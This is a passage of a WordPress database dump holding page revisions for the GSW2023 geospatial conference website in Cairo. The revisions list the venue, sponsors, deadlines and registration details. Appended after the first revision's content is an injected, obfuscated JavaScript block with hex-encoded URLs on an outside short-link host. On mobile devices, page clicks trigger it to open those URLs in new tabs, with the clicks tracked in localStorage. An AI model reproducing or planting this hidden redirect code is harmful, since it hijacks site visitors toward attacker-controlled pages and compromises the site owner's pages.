bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-06 22:29:51','2023-04-06 22:29:51','',3066,'https://gsw2023.com/?p=4035',0,'revision','',0),
(4036,1,'2023-04-06 22:32:07','2023-04-06 22:32:07','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400393668{margin-top: 125px !important;}\"]</p>\n<h6><img class=\"aligncenter wp-image-3987 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400301732{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><img class=\"aligncenter wp-image-3989 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680403737829{margin-top: 130px !important;}\"]<img class=\"aligncenter wp-image-3988 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680820176656{margin-top: 88px !important;}\"]<img class=\"alignnone size-medium wp-image-4033 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400702580{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><img class=\"alignnone size-medium wp-image-3997 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400628059{margin-top: 95px !important;}\"][/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 